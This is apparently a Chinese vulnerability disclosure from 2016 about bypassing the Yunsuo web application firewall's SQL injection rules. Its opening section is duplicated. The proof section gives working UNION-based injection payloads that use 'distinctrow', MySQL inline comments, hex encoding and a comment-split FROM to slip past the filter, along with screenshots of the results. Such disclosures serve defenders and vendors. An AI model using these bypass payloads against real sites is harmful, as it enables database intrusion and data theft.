### 简要描述: 完美Bypass云锁最新版(V1.6.153)SQL注入防护规则(可UNION) ### 详细说明: 云锁版本: [<img src="https://images.seebug.org/upload/201602/16154028ae4b2214e169a66fc73096013c9f3bc2.png" alt="C66EC306-F97B-40A6-9FEB-2D96C4A4DAF8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154028ae4b2214e169a66fc73096013c9f3bc2.png) [<img src="https://images.seebug.org/upload/201602/16154038ba2d17b347a8202367fc4b0f4720950d.png" alt="39536566-EBDD-48F8-B3BD-C51360382A76.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154038ba2d17b347a8202367fc4b0f4720950d.png) Mysql UNION语法 ``` http://**.**.**.**/doc/refman/5.5/en/union.html SELECT ... UNION [ALL | DISTINCT] SELECT ... [UNION [ALL | DISTINCT] SELECT ...] ``` 上回提到了这个union all ``` http://**.**.**.**/bugs/wooyun-2016-0170481 ``` 云锁在过滤危险请求的时候两个敏感字段相邻就会被干掉,但是两个敏感字段中间"插入"点什么的话就不会被匹配到。 distinct 虽然没提到distinctrow但是也可以。 ### 漏洞证明: 服务端Windows Server2003 + php + Apache + mysql...
### 简要描述: 完美Bypass云锁最新版(V1.6.153)SQL注入防护规则(可UNION) ### 详细说明: 云锁版本: [<img src="https://images.seebug.org/upload/201602/16154028ae4b2214e169a66fc73096013c9f3bc2.png" alt="C66EC306-F97B-40A6-9FEB-2D96C4A4DAF8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154028ae4b2214e169a66fc73096013c9f3bc2.png) [<img src="https://images.seebug.org/upload/201602/16154038ba2d17b347a8202367fc4b0f4720950d.png" alt="39536566-EBDD-48F8-B3BD-C51360382A76.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154038ba2d17b347a8202367fc4b0f4720950d.png) Mysql UNION语法 ``` http://**.**.**.**/doc/refman/5.5/en/union.html SELECT ... UNION [ALL | DISTINCT] SELECT ... [UNION [ALL | DISTINCT] SELECT ...] ``` 上回提到了这个union all ``` http://**.**.**.**/bugs/wooyun-2016-0170481 ``` 云锁在过滤危险请求的时候两个敏感字段相邻就会被干掉,但是两个敏感字段中间"插入"点什么的话就不会被匹配到。 distinct 虽然没提到distinctrow但是也可以。 ### 漏洞证明: 服务端Windows Server2003 + php + Apache + mysql 客户端Windows7 开启网站防御 [<img src="https://images.seebug.org/upload/201602/16154245f4379bc2a1caa814cf82aa2c35646da4.png" alt="屏幕快照 2016-02-16 下午3.42.21.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154245f4379bc2a1caa814cf82aa2c35646da4.png) 被拦截 [<img src="https://images.seebug.org/upload/201602/16154413ec572cf57579f6e133f3a0466517b8ef.png" alt="屏幕快照 2016-02-16 下午3.43.50.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154413ec572cf57579f6e133f3a0466517b8ef.png) ``` 1' union distinctrow select/*!USER*/(),/*!DATABASE*/()# ``` [<img src="https://images.seebug.org/upload/201602/16154644947fe247dbaf9cf6d99bb968b118883a.png" alt="屏幕快照 2016-02-16 下午3.45.54.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154644947fe247dbaf9cf6d99bb968b118883a.png) ``` ' union distinctrow select unhex('352E352E34322D6C6F67'),unhex('726F6F74406C6F63616C686F7374')# ``` [<img src="https://images.seebug.org/upload/201602/16154655c0d331cf4f565b3f75834c1a6eab041b.png" alt="屏幕快照 2016-02-16 下午3.46.12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/16154655c0d331cf4f565b3f75834c1a6eab041b.png) ``` FROM 1' union distinctrow select/*!USER*/(),/*!DATABASE*/()/*f*//*r*//*o*//*m*/users# ``` [<img src="https://images.seebug.org/upload/201602/161547057537f8798a200d549cb7095c6592eee3.png" alt="屏幕快照 2016-02-16 下午3.46.21.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/161547057537f8798a200d549cb7095c6592eee3.png)
